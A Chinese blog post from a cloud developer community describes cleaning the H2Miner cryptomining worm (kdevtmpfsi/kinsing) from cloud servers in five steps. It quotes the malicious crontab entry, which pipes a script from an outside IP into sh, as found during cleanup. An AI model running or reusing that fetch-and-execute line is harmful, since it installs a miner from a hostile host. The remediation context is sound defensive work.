Linux【问题记录 02】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)
原创
Linux【问题记录 02】阿里云+腾讯云服务器的 kdevtmpfsi(H2Miner挖矿蠕虫变种)病毒处理(5个详细步骤)
原创
yuanzhengme
修改于 2025-06-06 06:44:44
修改于 2025-06-06 06:44:44
登录云服务器查看了一下top,发现 kdevtmpfsi 的进程 cup 占用快100%了,腾讯云官方也有相关的 处理方法 腾讯手动清除H2Miner的【2 条建议如下】:
- 查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程,将其kill掉并删除对应的文件;
- 查找crontab任务中包含“95.3.146.118”的相关项并删除。
在网络上查看发现中招的朋友不少,详细的处理过程如下【一共 :five: 个步骤】
(1)查看kdevtmpfsi的守护进程kinsing先kill掉【否则kdevtmpfsi进程会不断恢复占用】
[root@aliyun ~]# ps -aux | grep kinsing
[root@aliyun ~]# kill -9 kinsing_pid(2) 查看kdevtmpfsi的进程并kill掉
[root@aliyun ~]# ps -aux | grep kdevtmpfsi
[root@aliyun ~]# kill -9 kdevtmpfsi_pid(3) 删除/tmp/下kdevtmpfsi相关文件
[root@aliyun ~]# cd /tmp/
[root@aliyun tmp]# rm -rf kdevtmpfsi(4)删除/var/tmp/下kinsing相关文件
[root@aliyun ~]# cd /var/tmp/
[root@aliyun tmp]# rm -rf kinsing(5)查询并删除定时任务
# 查询
[root@aliyun ~]# crontab -l
* * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
# 编辑删除【如果没有在用的其他定时任务可删除全部定时任务 crontab -r】
[root@aliyun ~]# crontab -e至此,云服务器问题解决【腾讯云也出现了这个病毒,处理方法基本一致】实际上并未彻底解决,后来又出现了,出现之后再次执行一遍即可,现在有一段时间没见到它了~
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
![Linux被kdevtmpfsi 挖矿病毒入侵[通俗易懂]](https://ask.qcloudimg.com/http-save/yehe-8223537/5a955e5fbf94b3e08f2ce233d910b945.png)
推荐阅读
相关推荐
Linux【问题记录 01】腾讯云 cron、sshd 进程CPU占用超95%(亡命徒 Outlaw 僵尸网络攻击)问题排查及处理步骤
更多 >
腾讯云开发者
